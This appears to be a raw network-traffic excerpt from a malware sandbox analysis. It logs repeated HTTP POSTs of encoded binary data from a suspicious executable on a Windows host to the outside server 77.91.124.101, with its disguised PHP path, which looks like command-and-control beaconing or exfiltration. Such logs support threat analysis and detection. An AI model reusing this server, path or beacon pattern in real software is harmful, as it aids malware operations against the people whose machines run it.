Nov 21, 2023 04:48:45.667335033 CET	630	OUT	Data Raw: 57 5c 58 5c 5b 5b 5a 5d 5d 57 55 57 55 57 57 50 50 5a 58 44 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\X\[[Z]]WUWUWWPPZXDVQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'?:R3;Z/'.[#?R'-' T9;>^(7\8&G''^)
Nov 21, 2023 04:48:45.868627071 CET	631	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	77.91.124.101	80	192.168.2.5	49834	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.470352888 CET	626	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.667021990 CET	627	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:45.667335033 CET	630	OUT	Data Raw: 57 5c 58 5c 5b 5b 5a 5d 5d 57 55 57 55 57 57 50 50 5a 58 44 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\X\[[Z]]WUWUWWPPZXDVQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'?:R3;Z/'.[#?R'-' T9;>^(7\8&G''^)
Nov 21, 2023 04:48:45.868627071 CET	631	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	77.91.124.101	80	192.168.2.5	49724	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:33.952024937 CET	189	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:34.148653030 CET	189	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:34.148940086 CET	192	OUT	Data Raw: 52 5b 5d 5a 5e 5d 5a 50 5d 57 55 57 55 5b 57 56 50 53 58 45 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z^]ZP]WUWU[WVPSXEV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>)(2T=3#,7541)39$&W029(>+<;\->&G''^)3
Nov 21, 2023 04:47:34.355681896 CET	192	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49724	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:33.952024937 CET	189	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:34.148653030 CET	189	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:34.148940086 CET	192	OUT	Data Raw: 52 5b 5d 5a 5e 5d 5a 50 5d 57 55 57 55 5b 57 56 50 53 58 45 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z^]ZP]WUWU[WVPSXEV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>)(2T=3#,7541)39$&W029(>+<;\->&G''^)3
Nov 21, 2023 04:47:34.355681896 CET	192	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.5	49835	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:46.192867041 CET	632	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:46.391906977 CET	632	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:46.392203093 CET	634	OUT	Data Raw: 57 51 58 5a 5e 5a 5a 51 5d 57 55 57 55 57 57 52 50 5a 58 43 56 54 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQXZ^ZZQ]WUWUWWRPZXCVTWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>>?>>#[.'%4:+>3>:W33>T-;*_<<',&G''^)
Nov 21, 2023 04:48:46.595650911 CET	635	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	77.91.124.101	80	192.168.2.5	49835	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:46.192867041 CET	632	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:46.391906977 CET	632	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:46.392203093 CET	634	OUT	Data Raw: 57 51 58 5a 5e 5a 5a 51 5d 57 55 57 55 57 57 52 50 5a 58 43 56 54 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQXZ^ZZQ]WUWUWWRPZXCVTWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>>?>>#[.'%4:+>3>:W33>T-;*_<<',&G''^)
Nov 21, 2023 04:48:46.595650911 CET	635	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.5	49836	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:46.908144951 CET	635	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:47.105767965 CET	636	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:47.105983019 CET	638	OUT	Data Raw: 57 5f 58 5f 5b 5a 5f 5a 5d 57 55 57 55 5a 57 56 50 5f 58 49 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_X_[Z_Z]WUWUZWVP_XIVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)2+]&S*3+\.$1#=_)#S$>W03:V:8&^(#];&G''^)7
Nov 21, 2023 04:48:47.308711052 CET	638	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	77.91.124.101	80	192.168.2.5	49836	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:46.908144951 CET	635	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:47.105767965 CET	636	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:47.105983019 CET	638	OUT	Data Raw: 57 5f 58 5f 5b 5a 5f 5a 5d 57 55 57 55 5a 57 56 50 5f 58 49 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_X_[Z_Z]WUWUZWVP_XIVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)2+]&S*3+\.$1#=_)#S$>W03:V:8&^(#];&G''^)7
Nov 21, 2023 04:48:47.308711052 CET	638	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	77.91.124.101	80	192.168.2.5	49837	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:47.629125118 CET	639	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:47.828713894 CET	639	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:47.828972101 CET	642	OUT	Data Raw: 52 5b 5d 5a 5b 53 5a 5b 5d 57 55 57 55 5e 57 55 50 5a 58 47 56 50 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z[SZ[]WUWU^WUPZXGVPWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=;<> 7,B9#6(0&Q'S-9<]/>&G''^)?
Nov 21, 2023 04:48:48.033458948 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.5	49837	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:47.629125118 CET	639	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:47.828713894 CET	639	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:47.828972101 CET	642	OUT	Data Raw: 52 5b 5d 5a 5b 53 5a 5b 5d 57 55 57 55 5e 57 55 50 5a 58 47 56 50 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z[SZ[]WUWU^WUPZXGVPWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=;<> 7,B9#6(0&Q'S-9<]/>&G''^)?
Nov 21, 2023 04:48:48.033458948 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	77.91.124.101	80	192.168.2.5	49838	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:48.348392010 CET	643	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:48.545490980 CET	643	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:48.545708895 CET	646	OUT	Data Raw: 52 5d 5d 5d 5b 53 5f 59 5d 57 55 57 55 5c 57 52 50 59 58 41 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]][S_Y]WUWU\WRPYXAVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^?;1>30/4&#)"<3-'.1$0!.->,<,&G''^)/
Nov 21, 2023 04:48:48.747749090 CET	646	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.5	49838	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:48.348392010 CET	643	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:48.545490980 CET	643	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:48.545708895 CET	646	OUT	Data Raw: 52 5d 5d 5d 5b 53 5f 59 5d 57 55 57 55 5c 57 52 50 59 58 41 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]][S_Y]WUWU\WRPYXAVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^?;1>30/4&#)"<3-'.1$0!.->,<,&G''^)/
Nov 21, 2023 04:48:48.747749090 CET	646	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.5	49839	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:49.065499067 CET	647	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:49.267235994 CET	647	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:49.267549038 CET	650	OUT	Data Raw: 57 5b 58 5e 5b 5c 5f 59 5d 57 55 57 55 5e 57 50 50 59 58 42 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X^[\_Y]WUWU^WPPYXBVWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^1^(+907;$] 9+3&>:S33%.>?<8.&G''^)+
Nov 21, 2023 04:48:49.470273018 CET	650	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	77.91.124.101	80	192.168.2.5	49839	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:49.065499067 CET	647	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:49.267235994 CET	647	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:49.267549038 CET	650	OUT	Data Raw: 57 5b 58 5e 5b 5c 5f 59 5d 57 55 57 55 5e 57 50 50 59 58 42 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X^[\_Y]WUWU^WPPYXBVWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^1^(+907;$] 9+3&>:S33%.>?<8.&G''^)+
Nov 21, 2023 04:48:49.470273018 CET	650	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	77.91.124.101	80	192.168.2.5	49840	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:50.064968109 CET	651	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:50.263237000 CET	651	IN	HTTP/1.1 100 Continue
